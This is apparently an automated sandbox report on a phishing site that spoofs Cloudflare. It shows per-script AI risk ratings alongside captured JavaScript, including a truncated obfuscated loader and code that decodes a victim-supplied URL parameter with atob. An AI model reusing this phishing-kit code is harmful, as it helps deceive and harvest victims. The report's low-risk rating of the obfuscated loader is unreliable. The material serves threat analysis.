| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a simple form submission function, which is a common and legitimate behavior. While it does not demonstrate any high-risk indicators, the lack of context around the form's purpose and the target domain means the script should be reviewed further to ensure it is not part of a larger malicious campaign."
} |
function RadiantChord() {
document.forms[0].submit();
}
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a part of a Cloudflare challenge system. It sets up various configuration options and handles communication between the parent window and the challenge widget. While the script contains some potentially risky behaviors, such as dynamic message passing and communication with external domains, the overall context suggests this is likely a legitimate challenge system and not a malicious script. Further investigation may be needed to fully understand the purpose and functionality of this code, but based on the available information, it is assessed as a medium-risk script."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'kfbv4',
chlApiSitekey: '0x4AAAAAAA3BkI2_RYPsS18V',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '7hu6DJz8KUJPS6eQCTV46cmDVYKKC3jjHMuFMoRrvIM-1736192414-1.3.1.1-8EF9PLi1nrFdLcegEamKprP8HKdPI2OZTlKoH5axxso',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fde2dc10d8218c0',
cH: 'U1T1RMACpkkdDXnd69lCeQ2Qkyyy8xGo2skeVy4XS.I-1736192414-1.1.1.1-U2cKnZVCQdjhhf6bsTI7wh9EDZDDTwRowbEfgfi9Zxb3i1nGXmV.ZMYJBvDazDXf',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'e513nH6.ZYZkuWWDAXXGY_e2FACYHa1oUpv4K_q0s_Q-1736192414-1.1.1.1-nyfNf7qkTVgFB6ECfENptGmofhlg.3S3pM_HoKf.P.z8bUrQ5WDaN5f3eZql44eDKEAo2Yjacn8Y7MRLdmboUVVt5Gp05ZZPZEfuNT4FHkYEDeHVwk3RnI8jReXLrmj_rxfAPHDePUj41jTC_5SeVigVatKFtRPw8sKvPDBG5qm4.fpDYn8BcZcM8_7YvQ2rOmcRMYh9MQi5KNXqfk3aK8nvKdwpgmH9R2vRBpGq6DffrNYeQuCO6KPhRGuDt2hS50uySRSU9cstDtxRGtRDui5jHrbKACfxtnsIlx_znzlGxMmko_CbnbtBdd2LAQ5Xa4.XYyzC7YxivWtUsqBgFY7okxTS1X1NIrJQO4MyUS4uGpfaF9JScsvVVkMQ07QSld1DmzviemsS5Vr2u95e2ac8wdmmFB4y_QNvQP0a2D.1IA0tY7TZV8hqGMo1iG1IOnz6rUhW2LLZO1OQrJs8xn6WLPs4MxWTHbXQ1B39lViCWFRkl7xBvzSaO.HCrHFthW3uw8SbqoKmsHAnjNj0_pP3LannQSsR2w06Wu4ouPpLM.nI7vhb_uLTqHaZ6d2bICMgzmfGUf8BZZrkpkwc.G6ruksgCjFJXMYtDdrNPnx5RwUYt53acLJ1cT18PpUvriLA4NF_fQhXh.z_1WdK9cv7C2yDVGvTuumxkdH182EPIVKgHyZz4XMjdZyPYKTC3OJVG.z5EXSr37hYsNEyo4OIvsgQoVnea714NO5kFmrR4UJ6.3O_94T4z8ZenVUPImmWcubLMHR.N3Xi51Rd5wgfSIcXQ9nsaueMMzD.KZm5cvM4HvYg9Lnr0LeD5_Bwnr.bKQ75PgA1HbWCzx33zLWoxXt3eTXusQT2YMZ3UXXidThQyKwLypqIK6gfi.ja1tV3L_dqooCkqBzKUav0RT9u2wZ3BynKrtvT6a59rwUr0MZOr6xrhE6YkQxfg2mB0oSaOzGxzYI_pFGvKTeM6TUy5pvdRHkekhwG17fKB10y54St5gPPKCCaBY0sH8Nx.7_ozR38tkheT0B.yUM5QRMwQDsV2T2yQSfmVXMf3YNPxPg4.VAgod_U8mfm9nyiW25Bqe3c_MlZL.uidCVIbCSa8LKJb0VO2GmT9x18qMiAIpcNf1ySsXcqrEgq6HKqwrfdz0TzC8naZ77BaYtLl5XatK4vD8o0JO2M8NU0GErLpueXIXGyI6nQuGcgSDNxC4XZHG3ioEmrjrt5aBxp0dMghKgm7OgGjjmPAAUx_AI2W4J9ELK0zvBTl0Dw8IZwX5fM6EQFEAKmdyuuuKyPcgPqqIdN2FAWl9e4dS4tyf1Q5yjaLavKqEimyf8fJ6OoQVROEeo94uG4pl2qEWsd28y5igChP9I6W1xEzRWUJYqhW7fkI0MSphTcnMXeft4KJzpEWMsRIXtX8LUlVpJ0cqd3x5JIZ16AZ28t.G6zTLgUF4HnrkSgGFjKzWPDCQGxOZd9U2DMNQ_z_Tvg05Kc307QhQ7O97cJiM2UXN3gWt5eo9bMuniYmX0eS_GjV4IumKpY8mdXb84OyVPESYXH5wBU7gZlkGJdEUj69HTpfvQEIi6463lDnmppyDy8.OfhQcb7zn31iKoXIqDzTjVgEw',
cITimeS: '1736192414',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'kfbv4',
nextRcV: '7hu6DJz8KUJPS6eQCTV46cmDVYKKC3jjHMuFMoRrvIM-1736192414-1.3.1.1-8EF9PLi1nrFdLcegEamKprP8HKdPI2OZTlKoH5axxso',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles the translation and configuration of the Cloudflare challenge UI, which is a legitimate use case. While the script uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a Cloudflare security feature, and the risk score is low."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_footer_terms":"Terms","turnstile_expired":"Expired","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_verifying":"Verifying...","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_timeout":"Timed%20out","turnstile_feedback_description":"Send%20Feedback","turnstile_success":"Success%21","turnstile_refresh":"Refresh","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you%20are%20human","turnstile_footer_privacy":"Privacy","turnstile_failure":"Error","turnstile_feedback_report":"Having%20trouble%3F","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","testing_only":"Testing%20only.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_overrun_description":"Stuck%20here%3F"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eU,eY,eZ,f3,f4,fa,fd,ff,fg,fh,ft,fF,fL,fM,fN,fX,g8,gc,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(279))/1*(parseInt(gI(1341))/2)+parseInt(gI(1604))/3+parseInt(gI(991))/4+-parseInt(gI(1084))/5*(parseInt(gI(267))/6)+parseInt(gI(586))/7*(-parseInt(gI(618))/8)+parseInt(gI(463))/9*(parseInt(gI(1623))/10)+parseInt(gI(659))/11*(parseInt(gI(522))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,653161),eM=this||self,eN=eM[gJ(1347)],eM[gJ(1428)]=![],eM[gJ(707)]=function(h5){if(h5=gJ,eM[h5(1428)])return;eM[h5(1428)]=!![]},eU=0,eN[gJ(1308)]===gJ(614)?eN[gJ(1597)](gJ(597),function(hg,c){hg=gJ,c={'thWXl':function(d,e,f){return d(e,f)}},c[hg(304)](setTimeout,eX,0)}):setTimeout(eX,0),eY={},eY[gJ(1418)]='o',eY[gJ(1486)]='s',eY[gJ(1403)]='u',eY[gJ(1330)]='z',eY[gJ(291)]='n',eY[gJ(809)]='I',eY[gJ(835)]='b',eZ=eY,eM[gJ(1487)]=function(g,h,i,j,hk,o,x,B,C,D,E,F){if(hk=gJ,o={'zjsXX':hk(1680),'dgvZJ':function(G,H){return G(H)},'vSBgE':function(G,H){return H===G},'FbcJg':hk(265),'Ffxpz':function(G,H){return G+H},'DZWkd':function(G,H,I){return G(H,I)}},h===null||void 0===h)return j;for(x=f2(h),g[hk(1173)][hk(1205)]&&(x=x[hk(1073)](g[hk(1173)][hk(1205)](h))),x=g[hk(1493)][hk(1461)]&&g[hk(1040)]?g[hk(1493)][hk(1461)](new g[(hk(1040))](x)):function(G,hm,H){for(hm=hk,G[hm(1463)](),H=0;H<G[hm(739)];G[H+1]===G[H]?G[hm(643)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hk(1168)][hk(289)](B),C=0;C<x[hk(739)];D=x[C],E=f1(g,h,D),o[hk(224)](B,E)?hk(954)!==hk(954)?(s[hk(1053)][hk(1464)]=g,h[hk(1053)][hk(1617)]=hk(1e3)):(F=o[hk(1156)]('s',E)&&!g[hk(1311)](h[D]),o[hk(1007)]== |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://dcvnewsyr1.dcrdcoveris.top Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://dcvnewsyr1.dcrdcoveris.top |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://challenges.cloudflare.com/turnstile/v0/g/8... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script contains no high-risk or moderate-risk indicators. It appears to be a utility script with no signs of malicious behavior, such as dynamic code execution or data exfiltration. The code is not obfuscated and does not interact with external domains. It uses modern JavaScript practices and does not exhibit aggressive DOM manipulation or legacy practices."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a heavily obfuscated and encoded string, which is a common technique used to hide the true intent of the code. However, the lack of any clear high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains, suggests that this script is likely benign and may be related to analytics or tracking functionality. While the obfuscation is concerning, the overall behavior does not appear to be malicious, and the script can be considered low risk."
} |
let rh13z8jemt = '';// Proident ullamco enim prosciutto excepteur veniam. Ham hock landjaeger culpa aliquip. Picanha jowl kielbasa cillum, alcatra short loin ribeye landjaeger anim. Veniam minim eiusmod, commodo hamburger meatloaf capicola. Pork loin porchetta jerky ad in rump. Ut officia sed in meatloaf meatball duis bresaola laboris. Ut short loin magna chislic, corned beef labore consequat mollit cupidatat turkey deserunt quis. Do duis picanha ut cupidatat, et quis pancetta drumstick. Ut dolore in venison shankle corned beef. Jowl capicola mollit dolor tail ex doner pancetta fatback frankfurter id. Bacon meatball id biltong velit excepteur nostrud ad short loin corned beef. Irure boudin bacon, meatloaf buffalo sunt veniam jowl nostrud do laboris aute pork loin shank fatback. Incididunt nulla dolor mollit cillum ut, et aute. Pork loin aute pork pastrami andouille in. Ham hock est consequat tri-tip ribeye.
function vdUs3_(){}var _Tq_vLF=Object['defineProperty'],rqy3LZ,oHglFup,KfOO6OZ,Do4r31b,__4rIZ,sAIpkgr,qoZCDN,Cfp3uI,OHWgH6,clOGiV,fwuM_s,u9St9VM,OxAcjzb,GnaNuP4,BByTC5B,ihgwj8M,wfTRGkC,hNfuIQM,fZiDYEn,kHspVY;function YnWMgZP(vdUs3_){return rqy3LZ[vdUs3_<0x1a?vdUs3_<-0x32?vdUs3_+0x33:vdUs3_>-0x32?vdUs3_+0x31:vdUs3_-0x7:vdUs3_+0x1f]}rqy3LZ=UQ76ue();function BN8JvdN(vdUs3_,_Tq_vLF){return oHglFup[YnWMgZP(-0x15)](null,vdUs3_,YnWMgZP(-0x31),{value:_Tq_vLF,configurable:!0x0})}oHglFup=Object.defineProperty;var tjzl7SI=[],WC65qs=dry2DQ((vdUs3_,_Tq_vLF=0x10,rqy3LZ,oHglFup=0xc)=>{for(_Tq_vLF=_Tq_vLF;_Tq_vLF%0x4===0x0;_Tq_vLF++)rqy3LZ=0x0,vdUs3_=vdUs3_.concat(dry2DQ(()=>{var _Tq_vLF;rqy3LZ++;if(rqy3LZ===0x1){return[]}for(_Tq_vLF=0x47;_Tq_vLF;_Tq_vLF--)vdUs3_.unshift(vdUs3_.pop());return[]})());for(oHglFup=oHglFup;oHglFup;oHglFup--)vdUs3_.unshift(vdUs3_.pop());return vdUs3_},0x1)(['.gL8RhOlNdm7Ka$oxSRH%CID?Jcl:Hgo{@n?@fH!3DUu"h4}Ex7gjv`M6q6+cVU+vw8k>/g~t^d_A<uxqZ#b[9#IB&[OjoU}vX37ujY17e"qy:7&+[Vv/k{I:MbHzHG+I(|gT/cuvDrckR>Xph;P6]>FjY(>6BG7`Qf~qdB@D[y>;,DR;_kz$b&|6YkHrBe%U/gbQ(>(A14=RZ0X>t;PfrTT!LRZ|mG^@wXO>d+1/MeEJm:8!_o}>bA1%t$4P+X9LU^b1$uX(14=B]lxVGh.%CqI8Lp>rYGoU7/;dI71p;Ch_,(^<xo/Z2K!{h^/[Y]FQwj/ha,!}quco<d4Zd;Pu]S~R&6wX!q}Q/n?evgoWYn`vYcSzG>guj{FYYp94xX+@(e~>a~$zw1TLj%7g.Xc[LK~%L4Z;BLSRwszmH/!Zg}$Gm.ShgJc>XBO.hbHA68&h+Cz^$C47^9=?b%7xVTcr]#IiLiLPH%ooV%GAES@<YBLwZJx/V^chb7%tekH9VQK<g}8MamRaD3X7:2XFLs7[]fX.L4ZDB%mNIlv;rfv<[+r;,[whxRGK?H%~TQHzH=m+xc?:L6T?Ury)dOo9/+E^]j/,[UoRB~7>L37DI8;][szVxR#Ixa8;rnIih`4rZEFtxrA=$N^&yBXbZnX0G6P^]4|CLWLS]dSC7d@++S1<^ZT~m8}{ZL~@b{IGT;<9V56aUj/h//)~DryXCbxVG,.^]uGoLDo|mA+KUYr6v!@<[eby:(^)4f]TX~1hJ#<1*EF@(dzlLt9L^laAjV7f87HtLU)gLYwo6GoOSW}4FYoWYJEiV4}*_yv2W{FWM_|9V.&KPOA|(y4Iejco9zom/+Efr<v,[r;m!..Rw=OCdK1/MiuwZ<BYG1cdb/%~EO41*JmESe~M/}ubwqu,*EXr/9=#CS1.Lf.Bm%oDL(@{PnRHYn`/Y)#4[L~1j7%C;+<rBC&yUL_:L,)tyrcxAnXpL4k4|}^,dHt|m#mVS37(IYoXdMk{jS40G<H|:p^d>i<a$S%Kgr]](^v8ea_YtoX;.SW[]Y~MLf.+6URuLh;LdJo][:`U+.SxXLv&,BO*d[+rZ]KHg}83$jlQ@3U]+zod&zc%CFFiL/uv6L#6Pd@;r1@<[0kJm8}Pxo/1,H%~Ee+YxuFU/~p<(/~6yuc7:PX0XRWTTUMqYK7M6U}pXw.DIz[][sz<YXSsG<HXu{FGTe+9VC9U//=M/r[7yobpt#7V<Wc[]I}fM~w:Hq}Q/n?iy7Mk;p>YmBS)_L~xr~1hJA|k<o%U/gb:$=Ic^ry}COo9/+E^]j/,dRZwBU&1y37~d|!+11b;,cR2Zx/aj]^hJ1+cVn6awZA@y/!Qekc7:PXxV[E^]X*l[1Z0m#mA"2~,My/ht!E~xT9/Vm_orbvCJ9<zHsFQwgO<(/~6y4=a!oX0G!EK4I}fM~w0m#m7X#OPIvTcYay{jDR{ZVv2pK!*1N|gd(mogr]](_}i@3=ch?7=VOx%C|1,dRZ*CySp87rMfS@htqkMd&wCVm_$X1|#t<&[BL}U/GW$$r[7^9=|:B4CL.E6]<v.L/uKBA+l?O;3v71kJ2j6,}}0ZLETXH%!e9<cVP%txrA=$qGKwlaJVOomGCE[95MJ&K7[|go8wSrmH&oq[C>;,`+4[V8F:p^tYS!ToiK@S3v3$o16^8X7:3X8XHP^]TI"&8~_BU}}I7r(9!1w1huZmy+#V6}9OZ1tYF<[Z!mQw;}H(,)tylaH+zod&s7tL%)i&YLfYq}nKn?_E"13D6Lq+BSBzLvjr{F}^9<Yx)+d+EvfL]vRU1BmooX=Vh=9|}^8&YLY]*+]<k~xvg@<YX$EYcSpGMP5pW%_Dw/gd26Qwe~f$pX}e:c7*`omG,kfrd}thHuJKgokhv.NIGazt$Yx+[wWzLvFO!%@1n[dZpFA[;p@>TT(DVyAdU7HGeEKCH)oL/u~B_+{>~rI+U!dt2j[,DR"z}vos|%G!}!ha7&Qwv=1$h!sDrc8Vb7xx@7+4j/.LH7nYGovX#OOLY@D[u`wYXS|V}v2pBOV!&+!<a+?UL_"/r[?Uryr,PX=VlP=z7ydLWLM6mo>L376j:vWdBEy:8#CgVvX?8vL>S<a$56"F=OM/y.h;4=xAzoK/YWTT~);&j).6GoOSW}4FYoWYJEMdJmBz$~Sr>IGT;<[Y89VwL8,LpXQ;9=zj3XwMv7%CY |
| URL: https://dcvnewsyr1.dcrdcoveris.top/AWHG8/... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The script demonstrates several high-risk behaviors, including the use of `atob()` to decode a value from the URL, which could be used to execute dynamic code. Additionally, the script contains a large amount of obfuscated text, which is a common tactic used in malicious scripts. While the script's purpose is not entirely clear, the combination of these factors suggests a medium to high risk of malicious intent."
} |
const athlete = (name) => {
name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
var results = regex.exec(location.search); // Fugiat dolore doner swine ball tip nostrud dolore aliquip chuck short loin laboris. Enim lorem cillum hamburger dolore in, alcatra eu labore meatball chislic. Pork loin commodo sunt elit in lorem mollit officia sausage jowl bresaola sed ut. Brisket in dolor, quis tongue in meatloaf et minim short ribs pork chop ullamco. Aute ipsum tenderloin sirloin. Ullamco ham officia, shankle ribeye do biltong. Minim beef ribs flank, filet mignon spare ribs pastrami brisket in ut laborum turducken. Picanha fatback alcatra pork loin. Rump venison cillum excepteur. Andouille frankfurter id ullamco tongue ut irure. Minim meatloaf cupidatat swine boudin magna ut ullamco dolore ribeye cupim ball tip. Aute non kevin, enim dolore chuck qui buffalo labore prosciutto chicken duis pastrami. Mollit nostrud ad ut, kevin landjaeger ut turducken pancetta tenderloin ullamco cupim ex eiusmod. Chislic jowl aute, esse reprehenderit est prosciutto ribeye tongue rump tempor sint. Aute non adipisicing cow aliqua chislic, officia prosciutto alcatra dolore id.
return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
} // Commodo prosciutto fatback buffalo t-bone short ribs. Velit ham hock prosciutto andouille non flank shankle. Veniam ut shoulder, aliqua cow prosciutto voluptate. Esse incididunt sunt doner swine, ham bresaola. Bacon velit strip steak, sint chuck nostrud capicola reprehenderit pork loin consectetur duis fatback ground round. Porchetta meatloaf est, fugiat exercitation pig leberkas sausage dolore salami veniam pork incididunt. Short ribs magna brisket swine elit ut sint cillum consequat burgdoggen t-bone rump doner. Kielbasa shank jowl, tenderloin pancetta beef ribs doner anim velit hamburger pork belly alcatra pastrami est. Pork loin et ipsum do salami short ribs, pork chop duis biltong cow meatloaf pariatur chicken irure. Eu rump bresaola, shoulder strip steak pig cupim aliqua biltong quis sint turkey jerky tri-tip deserunt. Frankfurter eu alcatra ad dolor prosciutto salami ea shank cow. Venison magna minim kielbasa shankle esse filet mignon ipsum ut shank culpa excepteur salami fugiat strip steak. Pariatur flank ham boudin. Quis shankle consectetur minim jowl ham nisi. Pork loin dolore prosciutto, filet mignon sirloin adipisicing reprehenderit bresaola consequat.
rh13z8jemt = athlete('e') == '' ? rh13z8jemt : athlete('e');
rh13z8jemt = atob(rh13z8jemt);
|
| URL: https://code.jquery.com/jquery-3.2.1.slim.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the minified version of the jQuery library, which is a widely-used and trusted JavaScript library. The code does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or suspicious redirects. The behaviors observed are typical of a legitimate JavaScript library, including DOM manipulation, event handling, and utility functions. While the code is minified, this is a common practice to optimize file size and performance, and does not inherently indicate malicious intent. Overall, this script is considered low risk."
} |
/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */
!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||r.isFunction(g)||(g={}),h===i&&(g=this,h--);h<i;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(r.isPlainObject(d)||(e=Array.isArray(d)))?(e?(e=!1,f=c&&Array.isArray(c)?c:[]):f=c&&r.isPlainObject(c)?c:{},g[b]=r.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},r.extend({expando:"jQuery"+(q+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===r.type(a)},isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var 